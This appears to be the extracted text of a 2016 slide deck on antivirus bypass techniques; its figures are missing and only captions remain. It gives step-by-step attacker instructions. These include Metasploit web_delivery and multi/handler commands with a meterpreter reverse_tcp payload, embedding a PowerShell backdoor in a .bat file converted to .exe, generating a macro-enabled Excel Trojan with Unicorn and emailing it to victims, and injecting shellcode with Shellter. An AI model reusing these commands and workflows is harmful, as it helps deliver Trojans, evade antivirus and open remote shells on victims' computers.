antivirus bypass techniques - 2016
TRANSCRIPT
2 | P a g e
A. Power Shell Exploitation1. Technique : Generating Executables (.exe & .bat) Files
Description :Attacker create a windows executable (.exe) program which acts as a Trojan. In this technique attacker generate a power shell command whose work is to create a webclient & embed the backdoor inside his executable program.
How : Attacker use Metasploit framework to generate power shell command.
use exploit/multi/script/web_delivery show targets set target 2 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <IP> set SRVHOST <Server IP> set URIPATH / exploit
After creating the link attackers only task is to run the command on victim computer so, for doing that attacker will create a batch file Eg. Notepad.bat
In Notepad.bat attacker write his code & embed the Evil Power Shell Command. Convert the .bat file to .exe & send to victim
Result :
Figure 1. Generating PowerShell Command
3 | P a g e
Figure 2. Embedding & Conversion of backdoor to .exe
Figure 3. Virus Total Result For Both Files
4 | P a g e
Figure 4. Victim Executing The Program
Figure 5. Attacker Getting Sessions
5 | P a g e
B. Macros1. Technique : Generating Macros Enable (.xlsm) Files
Description :Attacker creates a encoded payload using tool name Unicorn and use that payload to generate a macro enable Microsoft excel file which acts as a Trojan. How :
Download & install Unicorn git clone https://github.com/trustedsec/unicorn.git cd unicorn python unicorn.py windows/meterpreter/reverse_tcp <Attacker IP> <Port For Listening> macro
Attacker use Metasploit framework & start handler Exploit. use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <IP> set PORT <PORT> exploit
Now use the generated payload and create micro enable excel file
Result :
Figure 6. Generate Payload with unicorn
6 | P a g e
Figure 7. Attacker Machine Start Handler
Figure 8. Create a micro enable excel file with evil code
7 | P a g e
Figure 9. Virus Total Result
Figure 10. Attaching Trojan With Email
8 | P a g e
Figure 11. Send Trojan With Email On Different Email Vendors
Figure 12. Victim AV Bypass
9 | P a g e
Figure 13. Victim Opens The File
Figure 14. Attacker Sessions
10 | P a g e
C. Shellter Project1. Technique : Shellcode injection toolDescription :Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).The shellcode can be something yours or something generated through a framework, such as Metasploit.
Result :
Figure 15
11 | P a g e
Figure 16
12 | P a g e
Figure 17
13 | P a g e
Figure 18